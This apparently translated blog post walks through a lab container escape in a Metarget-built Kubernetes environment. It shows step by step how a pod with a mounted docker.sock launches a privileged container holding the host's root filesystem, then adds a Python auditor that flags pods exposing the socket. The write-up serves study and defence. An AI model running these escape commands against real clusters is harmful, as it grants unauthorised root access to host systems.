Container escape via a mounted docker.sock

admin, 2024-02-24 22:47:37


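Container escape: dangerous mounts

【Background】
The Docker socket is the Unix domain socket that the Docker daemon listens on. It is used to communicate with the daemon, both to query information and to issue commands. If this socket file (/var/run/docker.sock) is mounted inside a container that an attacker controls, the attacker can talk to the Docker daemon through it and send commands that create and run a new container with the host's root directory mounted inside it, which completes a simple escape.

【Environment setup】

  • Prepare the base environment; any version of Docker works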

./metarget gadget install docker --version 18.03.1
./metarget gadget install k8s --version 1.16.5 --domestic
root@zyliang:~/metarget# ./metarget cnv install mount-docker-sock
docker already installed
kubernetes already installed
mount-docker-sock is going to be installed
applying yamls/k8s_metarget_namespace.yaml
applying vulns_cn/mounts/pods/mount-docker-sock.yaml
mount-docker-sock successfully installed
root@zyliang:~/metarget# kubectl get pod -n metarget
NAME                READY   STATUS    RESTARTS   AGE
mount-docker-sock   1/1     Running   0          10s

  • Install the Docker command-line client

# Download the client and copy it into the container
root@zyliang:~# wget https://download.docker.com/linux/static/stable/x86_64/docker-17.03.0-ce.tgz
root@zyliang:~# docker ps | grep sock
b425667a1be5   ba6acccedd29                  "/bin/bash -c -- 'wh…"   4 minutes ago   Up 4 minutes              k8s_ubuntu_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_0
1b7ccc8e47bc   k8s.gcr.io/pause:3.1          "/pause"                 4 minutes ago   Up 4 minutes              k8s_POD_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_0
root@zyliang:~# docker cp docker-17.03.0-ce.tgz b425667a1be5:/
Successfully copied 27.8MB to b425667a1be5:/
root@zyliang:~# kubectl exec -ti mount-docker-sock -n metarget bash
root@mount-docker-sock:/# ls
bin  boot  dev  docker-17.03.0-ce.tgz  etc  home  lib  lib32  lib64  libx32  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
root@mount-docker-sock:/# tar xf ./docker-17.03.0-ce.tgz
root@mount-docker-sock:/# cd docker
root@mount-docker-sock:/docker# ls
docker  docker-containerd  docker-containerd-ctr  docker-containerd-shim  docker-init  docker-proxy  docker-runc  dockerd
  • Run docker ps inside the container to confirm that docker.sock is mounted and usable

root@mount-docker-sock:/docker# ./docker ps
CONTAINER ID        IMAGE                         COMMAND                  CREATED             STATUS              PORTS               NAMES
b425667a1be5        ba6acccedd29                  "/bin/bash -c -- '..."   7 minutes ago       Up 7 minutes                            k8s_ubuntu_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_0
1b7ccc8e47bc        k8s.gcr.io/pause:3.1          "/pause"                 7 minutes ago       Up 7 minutes                            k8s_POD_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_0
1f21b8c613d5        ba6acccedd29                  "/bin/bash -c -- '..."   4 hours ago         Up 4 hours                              k8s_ubuntu_mount-host-procfs_metarget_0c64df69-a9b3-447e-8286-879b65849696_0
eaa6db463eea        k8s.gcr.io/pause:3.1          "/pause"                 4 hours ago         Up 4 hours                              k8s_POD_mount-host-procfs_metarget_0c64df69-a9b3-447e-8286-879b65849696_0
336c2bef5a3f        5dd8f24429b4                  "kube-controller-m..."   45 hours ago        Up 45 hours                             k8s_kube-controller-manager_kube-controller-manager-zyliang_kube-system_10f23307b63ed7d3a0289ad0de3cac6e_2
ce01dda16af0        8d2e2e5a92ac                  "kube-scheduler --..."   45 hours ago        Up 45 hours                             k8s_kube-scheduler_kube-scheduler-zyliang_kube-system_11d278345de05e1c5c61a63a8a1d78b2_2
81438fb18ba4        f03a23d55e57                  "/opt/bin/flanneld..."   45 hours ago        Up 46 hours                             k8s_kube-flannel_kube-flannel-ds-kkpd9_kube-system_b82878a6-24fa-4c48-87ac-3b271537cc32_1
879f271e40c5        70f311871ae1                  "/coredns -conf /e..."   45 hours ago        Up 46 hours                             k8s_coredns_coredns-6955765f44-52zz5_kube-system_1c963a32-3b26-48bd-91fc-1960c1eff89a_1
3f0fae5accd1        628f0e52ae53                  "kube-apiserver --..."   45 hours ago        Up 46 hours                             k8s_kube-apiserver_kube-apiserver-zyliang_kube-system_566bd1d164c57c0f50f380d21698033e_1
8b3f58f3a00d        87a399dffea6                  "/usr/local/bin/ku..."   45 hours ago        Up 46 hours                             k8s_kube-proxy_kube-proxy-kvzgk_kube-system_f9c78d1a-813b-4957-b9cc-0d420c5c254b_1
8e348df66d56        303ce5db0e90                  "etcd --advertise-..."   45 hours ago        Up 46 hours                             k8s_etcd_etcd-zyliang_kube-system_98e5ca9d0b4f7e05e63d92dd34970ea9_1
f290e34beede        70f311871ae1                  "/coredns -conf /e..."   45 hours ago        Up 46 hours                             k8s_coredns_coredns-6955765f44-ng6wx_kube-system_c812523a-dba2-4c5f-ba63-64ef2e5c4568_1
b79655911a2c        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_coredns-6955765f44-52zz5_kube-system_1c963a32-3b26-48bd-91fc-1960c1eff89a_1
2250007f5f66        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_kube-flannel-ds-kkpd9_kube-system_b82878a6-24fa-4c48-87ac-3b271537cc32_1
f245faafd5f3        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_coredns-6955765f44-ng6wx_kube-system_c812523a-dba2-4c5f-ba63-64ef2e5c4568_1
aaedfa1721d1        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_kube-apiserver-zyliang_kube-system_566bd1d164c57c0f50f380d21698033e_1
6d4d5b451730        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_kube-proxy-kvzgk_kube-system_f9c78d1a-813b-4957-b9cc-0d420c5c254b_2
2acaa76e2732        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_kube-scheduler-zyliang_kube-system_11d278345de05e1c5c61a63a8a1d78b2_1
447554958f5b        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_etcd-zyliang_kube-system_98e5ca9d0b4f7e05e63d92dd34970ea9_1
7179398f9453        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_kube-controller-manager-zyliang_kube-system_10f23307b63ed7d3a0289ad0de3cac6e_1
3a91b45e2ca5        dirtycowdockervdso_dirtycow   "/bin/bash"              2 days ago          Up 46 hours         1234/tcp            dirtycowdockervdso_dirtycow_run_1
  • From inside the container, start a privileged container that mounts the host's root directory, completing the escape

root@mount-docker-sock:/docker# ./docker run -it -v /:/host --privileged --name=sock-test ubuntu /bin/bash
root@08554a1cd523:/# ls /host/
bin   dev            etc   home        initrd.img.old  lib    lost+found  mnt  proc  run   srv       sys  usr  vmlinuz
boot  dirtycow-vdso  evil  initrd.img  install         lib64  media       opt  root  sbin  swapfile  tmp  var  vmlinuz.old
root@08554a1cd523:/# cat host/etc/hostname
zyliang
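
To find workloads exposed to the escape shown above, the pod specs in a cluster can be audited for hostPath volumes that hand the Docker socket to a container. The following is an added example, not part of the original post or of Metarget. It goes slightly beyond the exact case here by also flagging hostPath volumes on a parent directory of the socket (/var/run, /run, /). The sample pods, the `pod` helper and the volume and container names are constructed for illustration.

```python
import posixpath

# Socket locations treated as sensitive (/var/run is usually a symlink to /run).
SOCKETS = ("/var/run/docker.sock", "/run/docker.sock")

def exposes_socket(host_path):
    """True if host_path is a socket path or one of its parent directories."""
    p = "/" + posixpath.normpath(host_path).lstrip("/")
    return any(p == s or s.startswith(p.rstrip("/") + "/") for s in SOCKETS)

def find_socket_mounts(pod_list):
    """Return (namespace, pod, container, hostPath, mountPath) per exposing mount."""
    findings = []
    for pod in pod_list.get("items", []):
        meta, spec = pod.get("metadata", {}), pod.get("spec", {})
        risky = {v["name"]: v["hostPath"]["path"]
                 for v in spec.get("volumes") or []
                 if v.get("hostPath") and exposes_socket(v["hostPath"]["path"])}
        containers = (spec.get("containers") or []) + (spec.get("initContainers") or [])
        for c in containers:
            for m in c.get("volumeMounts") or []:
                if m["name"] in risky:
                    # readOnly is deliberately not treated as a mitigation here.
                    findings.append((meta.get("namespace", "default"), meta.get("name"),
                                     c["name"], risky[m["name"]], m["mountPath"]))
    return findings

def pod(ns, name, host_path, mount_path):
    """Build a minimal constructed pod object with one hostPath volume."""
    return {"metadata": {"namespace": ns, "name": name},
            "spec": {"volumes": [{"name": "vol", "hostPath": {"path": host_path}}],
                     "containers": [{"name": "main", "volumeMounts": [
                         {"name": "vol", "mountPath": mount_path}]}]}}

# Constructed sample in the shape of `kubectl get pods -A -o json` output.
SAMPLE = {"items": [
    pod("metarget", "mount-docker-sock", "/var/run/docker.sock", "/var/run/docker.sock"),
    pod("monitoring", "log-agent", "/var/run/", "/host-run"),
    pod("default", "web", "/var/lib/app-data", "/data"),
]}

if __name__ == "__main__":
    for finding in find_socket_mounts(SAMPLE):
        print("hostPath exposes the Docker socket:", finding)
```

On a live cluster, replace SAMPLE with the parsed output of `kubectl get pods -A -o json`.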

【References】

https://github.com/Metarget/metarget/tree/master/writeups_cnv/mount-docker-sock

Originally published on the WeChat official account zyliang: Container escape via a mounted docker.sock
